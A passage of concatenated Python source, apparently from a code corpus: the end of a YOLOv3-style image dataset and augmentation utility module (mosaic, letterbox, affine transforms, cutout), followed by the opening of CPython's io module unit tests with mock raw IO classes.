index = self.indices[index]
hyp = self.hyp
if self.mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
# if random.random() < 0.5:
# img2, labels2 = load_mosaic(self, random.randint(0, len(self.labels) - 1))
# r = np.random.beta(0.3, 0.3) # mixup ratio, alpha=beta=0.3
# img = (img * r + img2 * (1 - r)).astype(np.uint8)
# labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not self.mosaic:
img, labels = random_affine(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
# convert xyxy to xywh
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])
# Normalize coordinates 0 - 1
labels[:, [2, 4]] /= img.shape[0] # height
labels[:, [1, 3]] /= img.shape[1] # width
if self.augment:
# random left-right flip
lr_flip = True
if lr_flip and random.random() < 0.5:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
# random up-down flip
ud_flip = False
if ud_flip and random.random() < 0.5:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
# np.clip(labels4[:, 1:] - s / 2, 0, s, out=labels4[:, 1:]) # use with center crop
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_affine
# Replicate
# img4, labels4 = replicate(img4, labels4)
# Augment
# img4 = img4[s // 2: int(s * 1.5), s // 2:int(s * 1.5)] # center crop (WARNING, requires box pruning)
img4, labels4 = random_affine(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
border=self.mosaic_border) # border to remove
return img4, labels4
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_affine(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# https://medium.com/uruvideo/dataset-augmentation-with-random-homographies-a8f4b44830d4
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(img.shape[1] / 2, img.shape[0] / 2), scale=s)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(-translate, translate) * img.shape[1] + border[1] # x translation (pixels)
T[1, 2] = random.uniform(-translate, translate) * img.shape[0] + border[0] # y translation (pixels)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Combined rotation matrix
M = S @ T @ R # ORDER IS IMPORTANT HERE!!
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
img = cv2.warpAffine(img, M[:2], dsize=(width, height), flags=cv2.INTER_LINEAR, borderValue=(114, 114, 114))
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = (xy @ M.T)[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# clip boxes
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=xy.T)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.2): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + 1e-16), h2 / (w2 + 1e-16)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + 1e-16) > area_thr) & (ar < ar_thr) # candidates
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def reduce_img_size(path='path/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except:
print('WARNING: image failure %s' % f)
def recursive_dataset2bmp(dataset='path/dataset_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='path/images.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as a attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import assert_python_ok, run_python_until_end
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
self.assertEqual(f.write(bytearray(b" world\n\n\n")), 9)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = bytearray(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(data, b" worl")
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(bytearray(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(bytearray()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
self.assertEqual(f.seek(self.LARGE), self.LARGE)
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
self.assertRaises(ValueError, self.open, bytes(fn_with_NUL, 'ascii'), 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test comsumes large resources; It takes
# a long time to build the >2GB file and takes >2GB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin' or sys.platform == 'uwp':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertTrue(f.tell() > 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
with self.open(support.TESTFN, "wb", 0) as f:
self.assertEqual(f.write(a), n)
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.write(a), n)
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
